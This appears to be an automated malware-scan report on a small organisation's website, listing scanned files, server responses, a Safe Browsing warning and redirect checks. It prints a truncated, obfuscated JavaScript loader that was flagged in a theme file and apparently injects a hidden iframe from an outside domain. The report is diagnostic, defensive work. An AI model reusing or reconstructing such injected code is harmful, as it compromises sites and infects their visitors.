Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=arfarfrockaway.org
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://arfarfrockaway.org/ | 200 OK Content-Length: 19015 Content-Type: text/html | clean |
http://arfarfrockaway.org/mint/?js | 404 Not Found Content-Length: 2445 Content-Type: text/html | clean |
http://cdn.dsultra.com/js/registrar.js | 200 OK Content-Length: 1688 Content-Type: application/x-javascript | clean |
http://arfarfrockaway.org/test404page.js | 404 Not Found Content-Length: 2445 Content-Type: text/html | clean |
http://arfarfrockaway.org/rw_common/themes/rwt_agent/javascript.js | 200 OK Content-Length: 20039 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) asd=function(){d.body++};a=("44,152,171,162,147,170,155,163,162,44,176,176,176,152,152,152,54,55,44,177,21,16,44,172,145,166,44,145,162,155,147,44,101,44,150,163,147,171,161,151,162,170,62,147,166,151,145,170,151,111,160,151,161,151,162,170,54,53,155,152,166,145,161,151,53,55,77,21,16,21,16,44,145,162,155,147,62,167,166,147,44,101,44,53,154,170,170,164,76,63,63,161,151,160,155,167,167,145,152,163,145,170,145,153,151,162,147,175,62,147,163,161,63,156,145,172,145,167,147,166,155,164,170,63,151,167 Antivirus reports:
| ||
http://arfarfrockaway.org/rw_common/themes/rwt_agent/jquery/jquery.js | 200 OK Content-Length: 55774 Content-Type: text/javascript | clean |
http://arfarfrockaway.org/rw_common/themes/rwt_agent/jquery/extracontent.js | 200 OK Content-Length: 237 Content-Type: text/javascript | clean |
https://a816-healthpsi.nyc.gov/DogLicense/js/eLocatorWidget.js | 404 Not Found Content-Length: 5238 Content-Type: text/html | clean |
http://s7.addthis.com/js/250/addthis_widget.js | 200 OK Content-Length: 10652 Content-Type: text/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: arfarfrockaway.org
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 17 Jan 2015 10:18:43 GMT
Accept-Ranges: bytes
Server: Apache
Vary: Accept-Encoding
Content-Length: 19015
Content-Type: text/html
Last-Modified: Wed, 31 Jul 2013 19:52:57 GMT
...19015 bytes of data.
GET / HTTP/1.1
Host: arfarfrockaway.org
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 17 Jan 2015 10:18:43 GMT
Accept-Ranges: bytes
Server: Apache
Vary: Accept-Encoding
Content-Length: 19015
Content-Type: text/html
Last-Modified: Wed, 31 Jul 2013 19:52:57 GMT
...19015 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: arfarfrockaway.org
Referer: http://www.google.com/search?q=arfarfrockaway.org
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: arfarfrockaway.org
Referer: http://www.google.com/search?q=arfarfrockaway.org
Result:
The result is similar to the first query. There are no suspicious redirects found.